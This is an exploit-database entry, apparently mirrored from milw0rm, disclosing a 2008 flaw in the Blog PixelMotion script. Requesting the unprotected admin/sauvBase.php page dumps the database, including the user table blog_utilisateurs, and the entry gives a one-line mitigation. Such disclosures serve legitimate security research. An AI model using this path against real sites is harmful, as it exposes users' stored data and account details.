Database Backup Dump Vulnerability

vendor:

Blog PixelMotion

by:

jiko [jiki team]

7.5

CVSS

HIGH

Database Backup Dump

N/A

CWE

Product Name: Blog PixelMotion

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Database Backup Dump Vulnerability

An attacker can exploit this vulnerability by accessing the URL http://[Site]/[script]/admin/sauvBase.php to dump the database table blog_utilisateurs.

Mitigation:

Ensure that the URL http://[Site]/[script]/admin/sauvBase.php is not accessible to unauthorized users.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blog PixelMotion 
# Bug   : Database Backup Dump Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip
 
=========================JIkI Team===================
# Exploit  :
 
  http://[Site]/[script]/admin/sauvBase.php
table of member is blog_utilisateurs
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-06]